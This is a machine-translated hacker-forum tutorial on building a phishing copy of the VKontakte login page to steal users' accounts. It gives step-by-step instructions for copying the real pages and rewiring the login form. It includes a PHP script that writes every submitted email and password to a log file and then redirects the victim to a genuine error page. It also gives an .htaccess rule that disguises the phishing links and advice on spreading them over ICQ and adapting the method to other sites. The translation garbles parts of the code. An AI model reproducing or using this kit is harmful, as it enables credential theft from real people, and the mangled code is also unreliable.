This page has been robot translated, sorry for typos if any. Original content here.

Faux pressé

[iNtrO]

Le faire était rien, c'était le soir .... En fait, sur mon premier article (le premier sur anti-chat), j'ai été tiré par le fait que dans la section acheter / vendre / échanger / lancer il y a un sujet dans lequel 10 vmz, et souvent demandé de créer tel ou tel faux ...
Je vais vous dire un article comment vous pouvez bidouiller avec un faux universel presque tout ce qui est détourné! Je vais montrer sur l'exemple de faux vkontakte.

[SeaRchINg]

Et donc, 1 ce dont nous avons besoin est de sélectionner la ressource et de collecter toutes les informations dont nous avons besoin, mais nous avons seulement besoin d'une copie de certaines pages.Nous allons à vkontakte.ru à travers Operu (!) . On appuie sur le bouton, on entre dans le login.pxp, on le prend pour l'index de notre faux. Nous pressons dans l'opéra: Échec -> Enregistrer sous -> Dans la boîte de dialogue ouverte sous le nom choisir (par défaut il y a le Web Archive ....) " HTML échouer avec des images ", et le graphe est obligatoire. - selon la page)


De plus nous entrons là des données irréelles et nous arrivons à la page sur laquelle il est écrit
Une telle adresse postale n'est pas enregistrée, ou le mot de passe est incorrect.
Nous l'enregistrons de la même manière, seulement au lieu d'index nous écrivons mal .
Ensuite, nous conduisons dans Google.ru la phrase Vkontakte.ru, cliquez sur Résultats supplémentaires avec vkontakte.ru » et la recherche de quelque chose lié à l'eroy du contact ... Sur la deuxième page, j'ai trouvé VKontakte | Erreur (http://vkontakte.ru/blank.php?code=10)- rappelez-vous, nous avons besoin de ce lien
Etats-Unis, tout ce dont nous avons besoin pour feyka de la ressource, nous l'avons déjà.

[CoDiNg]

Taxe, maintenant nous allons utiliser le formulaire de connexion. Ouvrez notre index.html et recherchez le formulaire de connexion.
 <form method = "post" name = "connexion" id = "login" action = "login.php">

  <input type = "hidden" name = "success_url" id = "success_url" value = "">
  <input type = "caché" nom = "fail_url" id = "fail_url" valeur = "">

  <input type = "hidden" nom = "try_to_login" id = "try_to_login" valeur = "1">
  <table align = "centre" cellpadding = 0 espacement des cellules = 7 border = 0 width = "40%">

  <tr>
  <td width = "100px">
  <span class = "gray"> Email: </ span>
  </ td>
  <td>

  <input class = "inputText" type = "texte" name = "email" valeur = "" id = "email" taille = "25" />

  <td>
  </ tr>
  <tr>
  <td>
  <span class = "gray"> Mot de passe: </ span>

  </ td>
  <td>
  <input class = "inputText" type = "mot de passe" name = "pass" valeur = "" id = "pass" size = "25" />

  </ td>
  </ tr>
 
  <tr>
  <td>
  & nbsp;
  </ td>
  <td>

  <input style = "marge-dessus: 1px; vertical-align: milieu;"  type = "case à cocher" name = "expire" id = "expire" valeur = "1" /> <small> Ordinateur extraterrestre </ small>

  </ td>
  </ tr>
  <tr>
  <td>
  & nbsp;
  </ td>
  <td>
De là, nous mémorisons 3 choses:
<form method = "post" name = "connexion" id = "login" action = "login.php">
<input class = "inputText" type = "texte" name = "email" valeur = "" id = "email" taille = "25" />
<input class = "inputText" type = "mot de passe" name = " pass " valeur = "" id = "pass" size = "25" />
C'est dans ces 3 choses que se situe la première partie de l'unicité, sur tout réseau social ou émily, ou ailleurs, partout la forme de l'entrée sera dans ce genre (enfin, seuls les noms des champs se réveillent), par exemple chez les camarades
<input id = "field_password" value = "" style = "largeur: 170px;" type = "mot de passe" size = "20" name = " st.password ">
Il suffit de distinguer le nom des champs, les éléments de conception, mais la fonction est la même pour tous.
Maintenant, nous créons un fichier php, et nous l'appelons login.php , son contenu:

Code PHP:
  <? php
 

/ *
#############
# by_NoNameZ #
###########
* /
$ f = fopen ( "log.txt" , "at" );
troupeau ( $ f , 2 );
if ( preg_match ( "/ ^ ( [.0-9a-z_-] +) ( ( ( [0-9a- z - ]+ \ . )+[0-9a-z]{2,4})$/ i " , $ _POST [ 'email' ]) &&! empty ( $ _POST [ 'mot de passe' ]))) {
fputs ( $ f , $ _POST [ 'email' ]. ;; " . $ _POST [ 'mot de passe' ]. " \ n " );
header ( "Emplacement: http: //" );
} else {
header ( "Emplacement: http: //" );
}
troupeau ( $ f , 3 );
fclose ( $ f );
?>
En fait, regardez le script, un couple de chaînes, mais c'est faux tout à fait normal, sa fonctionnalité:
Sauvegarde des variables transférées, vérification, redirection en fonction de la vérification.

Et maintenant, nous revenons à ces 3 lignes:
<form method = "post" name = "connexion" id = "login" action = " login.php ">
ici nous avons tout dans l'ordre, le nom de notre script correspond au nom du leur, il ne coïncide pas, alors nous le remplaçons ou nous le renommons.
<input class = "inputText" type = "texte" name = "email" valeur = "" id = "email" taille = "25" />
<input class = "inputText" type = "mot de passe" name = "pass" valeur = "" id = "pass" size = "25" />
De là, nous avons besoin de name = " email " et name = " pass "
Nous les colons dans notre script au bon endroit
  <? php
 

/ *
#############
# by_NoNameZ #
###########
* /
$ f = fopen ( "log.txt" , "at" );
troupeau ( $ f , 2 );
if ( preg_match ( "/ ^ ( [.0-9a-z_-] +) ( ( ( [0-9a- z - ]+ \ . )+[0-9a-z]{2,4})$/ i " , $ _POST [ 'email' ]) &&! empty ( $ _POST [ 'pass' ]))) {
fputs ( $ f , $ _POST [ 'email' ]. ;; " . $ _POST [ 'pass' ]. " \ n " );
header ( "Emplacement: http: //" );
} else {
header ( "Emplacement: http: //" );
}
troupeau ( $ f , 3 );
fclose ( $ f );
?>
Qui n'a pas remarqué, c'est $ _POST ['email'] et $ _POST ['pass']

Ensuite, regardez le script, puis la fonction IF ELSE apparaît, et si c'est un champ email qui correspond au mail (pseudo@mylo.ru, et non comment le message est envoyé), et le champ mot de passe n'est pas vide, la première redirection est exécutée le champ de passe est vide, puis le second est la redirection. De ceci il s'ensuit que si le Chell est entré dans un savon et quelque chose semblable à une passe, alors nous le jetons sur la page avec le http://vkontakte.ru/blank.php?code=10 érotique, et si vous avez entré des ordures (ici nous en avions besoin copie de la page bad.html? lorsque nous avons entré les mauvaises données), puis le rejeter, c'est-à-dire entrer bad.htm.

Code PHP:
  <? php
 

/ *
#############
# by_NoNameZ #
###########
* /
$ f = fopen ( "log.txt" , "at" );
troupeau ( $ f , 2 );
if ( preg_match ( "/ ^ ( [.0-9a-z_-] +) ( ( ( [0-9a- z - ]+ \ . )+[0-9a-z]{2,4})$/ i " , $ _POST [ 'email' ]) &&! empty ( $ _POST [ 'pass' ]))) {
fputs ( $ f , $ _POST [ 'email' ]. ;; " . $ _POST [ 'pass' ]. " \ n " );
header ( "Emplacement: http://vkontakte.ru/blank.php?code=10" );
} else {
en-tête ( "Location: bad.htm" );
}
troupeau ( $ f , 3 );
fclose ( $ f );
?>
Nous sauvegardons toutes les conneries sur le serveur (login.php, index.htm + dossier avec les fichiers, bad.htm + dossier avec les fichiers), crée le fichier log.txt (je conseille mon nom unique à venir, n'oubliez pas de changer dans le script), mettez lui chmod777.

3) une petite mise à jour ...

Cette mise à jour est très appropriée pour SI, à la racine de ftp, nous créons un fichier .htaccess avec le contenu suivant:

RewriteEngine On
RewriteCond% {REQUEST_FILENAME}! -f
RewriteCond% {REQUEST_URI}! Index \ .htm
RewriteRule (. *) Index.htm? [QSA]

ATTENTION !!!
! index \ .htm- cette redirection est référencée, si vous avez un faux login.html. alors vous devez renommer l'index dans la connexion.

Taxe, ce fichier nous donne un lien plus qualitativement plus malingre, à savoir:
le vôtre / n'importe quel texte, si vous connaissez la structure de lien du faux, par exemple, le contact, nous pouvons faire ceci:


yourfake.ro/ photos.php? act = show & id = 15884695_588954334 & uid = 359648756 & self = 6
et vparitez-le sur ICQ))) d'accord. moins visible maintenant faux))

C'est tout

[L'eND] En fait, c'est unique, mais le fait que vous pouvez aller à des camarades de classe, enregistrer aussi la page, entrer des variables, remplacer les URL (ici, je donne immédiatement http://odnoklassniki.ru/dk?st.cmd=error) et tout, absolument de la même manière aller sur mayile.ru, sauvegarder les variables et remplacer et tout))) La seule chose dont vous pourriez avoir besoin est la créativité, nous ne sauverons pas la page principale, mais la page de connexion.Vous pouvez également faire un forum si vous voulez obtenir un acc ( envoyer à PM
<a href="file"> lien vers un sujet </a>
, et dans le faux, vous spécifiez ce sujet pour la redirection.